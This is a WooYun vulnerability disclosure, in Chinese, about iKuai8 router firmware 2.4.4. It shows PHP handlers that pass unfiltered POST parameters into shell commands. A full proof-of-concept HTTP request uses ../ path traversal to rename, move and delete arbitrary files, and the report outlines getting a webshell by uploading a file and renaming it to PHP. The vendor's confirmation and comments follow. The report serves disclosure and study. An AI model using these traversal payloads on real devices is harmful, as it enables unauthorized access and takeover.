当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号: WooYun-2015-122633

漏洞标题: 爱快流控路由最新版(iKuai8_2.4.4_Build20150604-17_41)固件漏洞挖掘分析之二

相关厂商: 爱快免费流控路由

漏洞作者: Bear baby

提交时间: 2015-06-25 09:55

公开时间: 2015-09-23 14:34

漏洞类型: 非授权访问

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 无

5人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-25: 细节已通知厂商并且等待厂商处理中
2015-06-25: 厂商已经确认,细节仅向厂商公开
2015-06-28: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2015-08-19: 细节向核心白帽子及相关领域专家公开
2015-08-29: 细节向普通白帽子公开
2015-09-08: 细节向实习白帽子公开
2015-09-23: 细节向公众公开

简要描述:

固件版本:iKuai8_2.4.4_Build20150604-17_41
固件下载地址:http://patch.ikuai8.com/iso/iKuai8_2.4.4_Build20150604-17_41.iso

分析使用到的工具:EditPlus、DreamWeaver、Zend Studio、Ida Pro 6.1、BeyondCompare、Fiddler、中国菜刀、Kali、VisualStudio2010、vmware11等

注:本文基于逆向获取到的源文件进行分析。
本集要说的是任意文件操作那些事。。

详细说明:

任意文件操作



1、文件上传

爱快流控路由器系统在多个地方使用了文件上传功能如

系统设置-升级备份-版本升级

系统设置-升级备份-系统备份

认证计费-认证账号管理-账号管理

行为管理-分组管理-终端信息管理

行为管理-网站浏览控制-云安全

行为管理-网站浏览控制-本地拦截

等等十几处地方。

这些上传均使用/application/helpers/function_helper.php里面的ik_upload()函数进行上传。ik_upload()代码如下

code 区域
/**


 * 功能:上传文件


 * 参数


 * $obj  : 提交$this 对象


 * $file : 上传控件的名字


 * $dir  : 上传路径


 * $filename :  上传的文件名


 *  


 */





function ik_upload($obj,$file='userfile',$dir,$filename=''){


/*


	switch ($filename) {


		case 'system.test':break;


		case 'b.jpg':break;


		default: echo "<script>alert('NO File!');</script>";exit;


	}


*/


	  $config['upload_path'] = $dir;


	  $config['allowed_types'] = 'txt|bak|import|patch|lib|zip|rar'; //只允许上传类型


	  $config['file_name'] = $filename;


	  $config['overwrite'] = TRUE; 





      //print_r($config);exit;


	  


	  $obj->load->library('upload', $config);


	  if (!$obj->upload->do_upload($file))


	  {


	   $data = array('error' => $obj->upload->display_errors());


	  } 


	  else


	  {


	   $data = array('upload_data' => $obj->upload->data());


	  // echo "<script>alert('upload ok!');history.back();<//script>";


	  } 


	 //print_r($data);


	 if(isset($data['error'])){


	     //echo "<script>alert('上传文件失败!');history.back();<//script>;";


		 return false;


	 }else{


	    return true;


	 }


}





该函数调用框架中CI_Upload do_upload进行文件上传处理,具体过程略过。知道有这些地方可以上传文件即可。





2、重命名、移动任意文件

接下来说明文件重命名的问题,该系统中共有三处用到重命名的功能。

分别是:

/application/controllers/Service/local_storage.php

/application/controllers/System/backup.php

/application/controllers/System/update.php

其中local_storage.php是服务中心里面的功能,但在系统中没有菜单,隐藏不体现可能是测试功能。update.php是升级备份中的版本升级功能页面,存在重命名功能,但在页面上也没体现,可能为遗留或者测试功能。backup.php是升级备份中的系统备份功能页面。

这几个页面的重命名函数均为save()代码如下:

code 区域
//编辑保存


	public function save(){


		shellControl($this->shellmodel,'rename '.$_POST['old_bakname'].' '.$_POST['bakname'],'',false);


		echo json_encode($_POST);


	}





调用了shellControl函数执行重命名,shellControl在/application/helpers/db_helper.php中。

shellControl函数代码如下:

code 区域
/* 


 @功能:对shell命令的操作进行二次封装


 @参数:


   $model--对应模块


   $shell--shell命令    


   $data --拼接数据


 @返回:string or array


 @data:20140211 by tian


 >/dev/null 2>/dev/null &


*/





function shellControl($model,$shell,$data=array(),$return=true){   //默认有返回值的


	 if(!$data){


			  $str = '';


		  }else{


              if(!is_array($data))return false;


			  $key = array_keys($data);


			  $val = array_values($data);


			  $str = '';


			  foreach($key as $k=>$v){


				//$str .= $v.'="'.$val[$k].'" ';


			  	$str .= $v."='".$val[$k]."' ";


			  }


		  }


			  $redirt = '>/dev/null 2>/dev/null &'; 


			  if(!$return){


			     ikExec($model,$shell." ".trim($str).' '.$redirt);//重定向没有返回值


				 //echo sqlMsg();exit;


			  }else{


			     $res = json_decode(ikExec($model,$shell." ".trim($str)),true);


			  }


			  


			  return $return?$res:'ok';//暂时返回OK


}





从函数功能描述就可以看出调用shell命令来执行的,参数是通过拼接进行。该函数对命令及参数进行拼接处理,然后调用libikphp.so里面的ikExec来执行命令。这个函数涉及到命令执行漏洞,这边暂且不提,后面再进行分析,现在主要是讲文件重命名的问题。

save函数里面只有两个参数,都是POST来的。old_bakname 旧文件名,bakname 新文件名。由于这个函数没有对参数进行任何过滤等防护操作。所以我们可以通过控制这两个参数,来达到重命名任意文件的效果。如果参数里面添加路径参数,可以把文件移动到任意位置。看到这边,完全可以想到,通过上传文件-重命名为php,即可获取到webshell。

下面来验证一下:







漏洞证明:

1)重命名任意文件

首先使用前面的正向shell,在系统根目录创建一个文件test.txt

1.png



code 区域
echo test>/test.txt



然后用Fiddler向系统备份页面POST一个修改文件名的请求。将根目录下的test.txt重命名为newtest.txt。如下

code 区域
Request


POST **.**.**.**/System/backup/save HTTP/1.1


Host: **.**.**.**


User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0


Accept: application/json, text/javascript, */*; q=0.01


Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3


Accept-Encoding: gzip, deflate


DNT: 1


Content-Type: application/x-www-form-urlencoded; charset=UTF-8


X-Requested-With: XMLHttpRequest


Referer: **.**.**.**/System/backup


Content-Length: 70


Cookie: PHPSESSID=e6b8bf28447de49246be1ee4b7876e49


Connection: keep-alive


Pragma: no-cache


Cache-Control: no-cache





bakname=..%2F..%2F..%2Fnewtest.txt&old_bakname=..%2F..%2F..%2Ftest.txt





RESPONSE


HTTP/1.1 200 OK


X-Powered-By: PHP/5.3.1


Content-Type: text/html;charset=utf-8


Expires: Thu, 19 Nov 1981 08:52:00 GMT


Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0


Pragma: no-cache


Date: Fri, 24 Apr 2015 08:23:14 GMT


Server: lighttpd/1.4.30


Content-Length: 74





{"bakname":"..\/..\/..\/newtest.txt","old_bakname":"..\/..\/..\/test.txt"}



ls一下看看文件名是否改变,如下图。test.txt已经成功变成newtest.txt

2.png



已经成功重命名根目录下面的文件。



2)移动任意文件

上面演示重命名任意文件,接下来看看移动任意文件,也是通过post文件名,区别在于改变新文件名的路径。我们把刚的newtest.txt移动到网页目录下abc.txt。

bakname=..%2F..%2F..%2Fusr%2Fikuai%2Fwww%2Fabc.txt&old_bakname=..%2F..%2F..%2Fnewtest.txt

3.png





3、删除任意文件

系统中共有两处地方涉及到,分别在

/application/controllers/System/backup.php

/application/controllers/System/update.php

函数名opera(),代码如下

code 区域
//删除、恢复


	function opera(){


		$type = trim($_POST['type']);


		switch($type){


			case 'del':


				shellControl($this->shellmodel,'del_bak '.$_POST['bakname']);//暂无返回值


				echo json_encode(array("recode"=>'0','error'=>'ok'));


				break;


			case 'recover':


				$res = shellControl($this->shellmodel,'restore '.$_POST['bakname']);


			    //print_r($data);exit;


				if($res['res'] == '1'){


					$data['recode'] = '0';


					$data['recover'] = '1';


				}else{


				    $data['recode'] = '100';


					$data['error'] = '备份恢复失败!';


				}


				echo json_encode($data); 


				break;


		} 


	}



问题和重命名一样,没有做任何处理,调用shell命令 删除 POST上来的bakname参数所指文件名,这边不在演示操作。



总结:

这个系统里面对文件的操作没有进行过滤,导致可以重命名、移动、删除。另外/application/controllers/Service/local_storage.php本地存储的页面,如下

4.png





可以进行文件上传、重命名、创建目录、列目录、获取硬盘信息等等,且和前面的一样,基本没什么过滤。可能页面不完善直接web操作有问题,通过Fiddler Post可以进行操作。

修复方案:

这个还是你们自己解决把···要去复习了。。不要恨我。

版权声明:转载请注明来源 Bear baby@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-06-25 14:33

厂商回复:

又来一波,争取一次处理完成,感谢白帽子兄弟,好好复习。。。

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2015-06-25 18:38 | Angelic47 ( 路人 | Rank:1 漏洞数:1 )
    0

    厂家回复好温馨

    1# 回复此人
  2. 2015-06-27 07:19 | 爱快免费流控路由(乌云厂商)
    0

    @Angelic47 作为负责任,对白帽子也懂得尊重的企业,我的答复属于一个比较合理范围,如果是再年轻10岁,我差不多都要说亲,感谢,么么哒一类的

    2# 回复此人
  3. 2015-06-28 23:11 | Fire ant ( 普通白帽子 | Rank:107 漏洞数:29 | 他们回来了................)
    0

    @爱快免费流控路由 在假设年轻十岁的基础上判断………28以上40以下

    3# 回复此人

登录后才能发表评论,请先 登录